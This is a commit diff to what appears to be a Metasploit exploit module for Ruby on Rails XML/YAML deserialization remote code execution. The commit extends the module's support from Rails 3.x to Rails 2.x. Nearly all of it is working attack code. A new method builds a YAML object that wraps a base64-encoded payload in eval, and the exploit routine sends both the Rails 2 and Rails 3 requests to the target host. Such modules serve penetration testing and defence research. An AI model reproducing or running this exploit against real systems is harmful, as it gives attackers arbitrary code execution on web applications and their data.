Merge in Rails2 support now that its in master
parent
bf013ba65f
commit
42ea64c21b
|
@ -22,9 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
an attacker to instantiate a remote object, which in turn can be used to execute
|
an attacker to instantiate a remote object, which in turn can be used to execute
|
||||||
any ruby code remotely in the context of the application.
|
any ruby code remotely in the context of the application.
|
||||||
|
|
||||||
This module has been tested across multiple versions of RoR 3.x, but does not yet
|
This module has been tested across multiple versions of RoR 3.x and RoR 2.x
|
||||||
work against 2.x versions of RoR.
|
|
||||||
|
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -85,7 +83,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
# Create the YAML document that will be embedded into the XML
|
# Create the YAML document that will be embedded into the XML
|
||||||
#
|
#
|
||||||
def build_yaml
|
def build_yaml_rails2
|
||||||
|
|
||||||
|
# Embed the payload with the detached stub
|
||||||
|
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
||||||
|
yaml =
|
||||||
|
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
|
||||||
|
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
|
||||||
|
"eval(%[#{code}].unpack(%[m0])[0]);' " +
|
||||||
|
": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " +
|
||||||
|
":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " +
|
||||||
|
":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n"
|
||||||
|
yaml
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
#
|
||||||
|
# Create the YAML document that will be embedded into the XML
|
||||||
|
#
|
||||||
|
def build_yaml_rails3
|
||||||
|
|
||||||
# Embed the payload with the detached stub
|
# Embed the payload with the detached stub
|
||||||
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
|
||||||
|
@ -101,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
#
|
#
|
||||||
# Create the XML wrapper with any desired evasion
|
# Create the XML wrapper with any desired evasion
|
||||||
#
|
#
|
||||||
def build_request
|
def build_request(v)
|
||||||
xml = ''
|
xml = ''
|
||||||
|
|
||||||
elo = Rex::Text.rand_text_alpha(rand(12)+4)
|
elo = Rex::Text.rand_text_alpha(rand(12)+4)
|
||||||
|
@ -120,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
el = Rex::Text.rand_text_alpha(rand(12)+4)
|
el = Rex::Text.rand_text_alpha(rand(12)+4)
|
||||||
xml << "<#{el} type='yaml'>"
|
xml << "<#{el} type='yaml'>"
|
||||||
xml << build_yaml
|
xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3)
|
||||||
xml << "</#{el}>"
|
xml << "</#{el}>"
|
||||||
|
|
||||||
if datastore['XML::PadElement']
|
if datastore['XML::PadElement']
|
||||||
|
@ -142,13 +158,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Send the actual request
|
# Send the actual request
|
||||||
#
|
#
|
||||||
def exploit
|
def exploit
|
||||||
data = build_request
|
|
||||||
print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
|
print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => datastore['URIPATH'] || "/",
|
'uri' => datastore['URIPATH'] || "/",
|
||||||
'method' => datastore['HTTP_METHOD'],
|
'method' => datastore['HTTP_METHOD'],
|
||||||
'ctype' => 'application/xml',
|
'ctype' => 'application/xml',
|
||||||
'data' => data,
|
'data' => build_request(3)
|
||||||
|
}, 25)
|
||||||
|
handler
|
||||||
|
|
||||||
|
print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => datastore['URIPATH'] || "/",
|
||||||
|
'method' => datastore['HTTP_METHOD'],
|
||||||
|
'ctype' => 'application/xml',
|
||||||
|
'data' => build_request(2)
|
||||||
}, 25)
|
}, 25)
|
||||||
handler
|
handler
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue